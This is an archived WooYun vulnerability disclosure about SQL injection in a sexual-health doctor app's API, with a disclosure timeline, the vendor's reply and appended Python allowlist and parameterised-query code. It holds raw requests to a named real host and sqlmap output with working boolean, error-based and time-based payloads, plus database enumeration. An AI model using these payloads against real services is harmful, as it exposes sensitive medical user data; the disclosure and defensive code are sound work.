WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-04-16: Details have been sent to the vendor and are awaiting handling
2015-04-17: Vendor has confirmed; details disclosed to the vendor only
2015-04-27: Details disclosed to core white hats and experts in related fields
2015-05-07: Details disclosed to regular white hats
2015-05-17: Details disclosed to intern white hats
2015-06-01: Details disclosed to the public

"Sexual Health Private Doctor" (两性私人医生) app SQL injection vulnerability (over 3 million users' information affected) ~so embarrassing~
POST /client/api.php?randnum=0.8167588198557496 HTTP/1.1
Content-Length: 417
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

action=chatnow&doctorid=1&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user

Parameter: doctorid
POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1
Content-Length: 361
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

action=login&number=1&password=e&ver=1.3

Parameter: number
POST /client/api.php?randnum=0.0867801399435848 HTTP/1.1
Content-Length: 362
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

action=login&number=e&password=admin&ver=1.3

Parameter: password
POST /api/m.php?randnum=0.8685849541798234 HTTP/1.1
Content-Length: 306
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

action=chatend&chatid=1

Parameter: chatid
POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1
Content-Length: 356
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

action=login&password=e&username=e
POST /api/m.php?randnum=0.3527681708801538 HTTP/1.1
Content-Length: 344
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

action=logout&userid=1

Parameter: userid
POST /api/m.php?randnum=0.42485142801888287 HTTP/1.1
Content-Length: 354
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=qr9m0vochgiek7ojk55ubnp295
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*

action=login&password=e&username=admin

Parameter: username
http://medapp.ranknowcn.com/client/image.php?key=e

Parameter: key
---
Parameter: doctorid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: action=chatnow&doctorid=-5475' OR 4249=4249#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: action=chatnow&doctorid=-4478' OR 1 GROUP BY CONCAT(0x716a767671,(SELECT (CASE WHEN (1098=1098) THEN 1 ELSE 0 END)),0x71706b7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: action=chatnow&doctorid=1' AND (SELECT * FROM (SELECT(SLEEP(20)))GXDX)#&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
---
web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] lucky_draw
[*] medapp
Database: medapp [160 tables]
You get the idea.
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-04-17 14:17
Thanks for the report. Some parameters were left unhandled in the last cleanup; global filtering of incoming parameters has now been applied.
None yet
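The vendor's stated fix is global filtering of incoming parameters. The more robust pattern for the endpoints in this report is a per-action allowlist of expected parameters, with every value bound as a query parameter rather than concatenated into SQL. The following is an added illustration, not the application's own code: the action names and parameter schemas are assumptions modelled on the requests above, and the `doctor` table is a constructed SQLite stand-in.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Hypothetical per-action allowlist for the api.php / m.php actions in the
# report (chatnow, login, chatend, logout). None means free text, which is
# acceptable only because every value is bound as a query parameter below.
INT = re.compile(r"[0-9]{1,10}")
SCHEMAS = {
    "chatnow": {"doctorid": INT, "pagename": re.compile(r"msg"), "source": None,
                "sourceid": None, "sourcetype": None, "userid": None,
                "usertype": re.compile(r"user|doctor")},
    "login": {"number": INT, "password": None, "ver": re.compile(r"[0-9.]{1,8}")},
    "chatend": {"chatid": INT},
    "logout": {"userid": INT},
}

def validate(body):
    """Parse a url-encoded POST body; return (action, params) or raise ValueError."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    action = params.pop("action", None)
    if action not in SCHEMAS:
        raise ValueError("unknown action")
    schema = SCHEMAS[action]
    if set(params) - set(schema):
        raise ValueError("unexpected parameter")
    for name, pattern in schema.items():
        if pattern is not None and not pattern.fullmatch(params.get(name, "")):
            raise ValueError("bad value for " + name)
    return action, params

def accepts(body):
    """True if the body passes validation, False if it would be rejected."""
    try:
        validate(body)
        return True
    except ValueError:
        return False

def make_db():
    """Constructed in-memory stand-in for the medapp 'doctor' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE doctor (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO doctor VALUES (?, ?)", [(1, "dr-one"), (2, "dr-two")])
    return conn

def lookup_doctor(conn, doctorid):
    """Parameterised lookup: the driver binds the value, nothing is concatenated."""
    return conn.execute("SELECT id, name FROM doctor WHERE id = ?", (int(doctorid),)).fetchall()
```

Fed the original chatnow body from the report, `validate` returns the parsed parameters; fed sqlmap's boolean-based `doctorid` payload, it rejects the request before any query is built.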